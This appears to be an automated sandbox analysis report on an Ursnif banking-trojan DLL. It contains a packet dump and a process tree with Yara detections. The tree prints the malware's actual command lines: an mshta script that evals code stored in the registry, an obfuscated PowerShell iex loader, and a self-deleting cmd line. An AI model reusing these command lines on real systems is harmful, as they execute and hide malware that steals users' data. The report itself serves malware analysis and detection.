d7 98 54 14 92 eb 8f 4e 62 a3 f2 7e 80 f8 92 9d 71 a2 ed 5c 8a 7c f2 dd 5c 75 7c 65 29 cd 7c e2 5d aa 2d f2 1d f5 f7 ab 93 ec 3b 66 10 48 80 13 8e 53 aa 6d ca d6 5e d2 47 e2 a0 4b fe ca fd 03 fd fa 45 3e c5 74
                          Data Ascii: @Z $&~N]<M|}9pqE`2]aPe["w~*|/vI-PV~yJe&rc[<YCTeGh a)oV9~.G!6%:6N`IO]%@ dK'[VswoakNsw"H.zsLQ [$h8j5,p{1*"m]|t4~k:\Yg+c$P 0(kQ^i(iQFrP*|lZ-0fyQ24@{un2C9_@#(Hul./YV3o<tpQ&h:'GB$r70B=WIx&f6*rc~qwmy:'.;S7ETRg<D*X&Cp+Ckob({u`,>V>lll%r1'u" F]6wi,JiC"W,rMIVJ8Ph3iV2W0]uH^48(,`o+Z}R85(+b?C`[aTgi+mNjV?S^yHeVZxpCu<X#nMo\M&5)1{k_:rH%7Yn7|:mjLB+ar?Y!H7:~r0DTNb~q\|\u|e)|]-;fHSm^GKE>t


                          Target ID:0
                          Start time:08:11:50
                          Start date:23/04/2022
                          Path:C:\Windows\System32\loaddll32.exe
                          Wow64 process (32bit):true
                          Commandline:loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll"
                          Imagebase:0x990000
                          File size:116736 bytes
                          MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:1
                          Start time:08:11:51
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                          Imagebase:0x1190000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:2
                          Start time:08:11:51
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\rundll32.exe
                          Wow64 process (32bit):true
                          Commandline:rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                          Imagebase:0x270000
                          File size:61952 bytes
                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          Target ID:4
                          Start time:08:11:53
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                          Imagebase:0x10e0000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:10
                          Start time:08:12:02
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616
                          Imagebase:0x1220000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:14
                          Start time:08:12:12
                          Start date:23/04/2022
                          Path:C:\Windows\SysWOW64\WerFault.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                          Imagebase:0x1220000
                          File size:434592 bytes
                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:23
                          Start time:08:12:28
                          Start date:23/04/2022
                          Path:C:\Windows\System32\mshta.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                          Imagebase:0x7ff701c00000
                          File size:14848 bytes
                          MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:24
                          Start time:08:12:31
                          Start date:23/04/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Yara matches:
                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:high

                          Target ID:25
                          Start time:08:12:31
                          Start date:23/04/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Target ID:26
                          Start time:08:12:38
                          Start date:23/04/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                          Imagebase:0x7ff7979b0000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:moderate

                          Target ID:27
                          Start time:08:12:40
                          Start date:23/04/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
                          Imagebase:0x7ff7871c0000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          Target ID:28
                          Start time:08:12:43
                          Start date:23/04/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                          Imagebase:0x7ff7979b0000
                          File size:2739304 bytes
                          MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Target ID:29
                          Start time:08:12:46
                          Start date:23/04/2022
                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                          Imagebase:0x7ff7871c0000
                          File size:47280 bytes
                          MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:30
                          Start time:08:12:49
                          Start date:23/04/2022
                          Path:C:\Windows\System32\control.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\control.exe -h
                          Imagebase:0x7ff61b590000
                          File size:117760 bytes
                          MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:32
                          Start time:08:12:52
                          Start date:23/04/2022
                          Path:C:\Windows\System32\rundll32.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                          Imagebase:0x7ff7567e0000
                          File size:69632 bytes
                          MD5 hash:73C519F050C20580F8A62C849D49215A
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:33
                          Start time:08:12:54
                          Start date:23/04/2022
                          Path:C:\Windows\explorer.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\Explorer.EXE
                          Imagebase:0x7ff6f3b00000
                          File size:3933184 bytes
                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:37
                          Start time:08:13:12
                          Start date:23/04/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:38
                          Start time:08:13:12
                          Start date:23/04/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:39
                          Start time:08:13:13
                          Start date:23/04/2022
                          Path:C:\Windows\System32\PING.EXE
                          Wow64 process (32bit):false
                          Commandline:ping localhost -n 5
                          Imagebase:0x7ff69dae0000
                          File size:21504 bytes
                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          No disassembly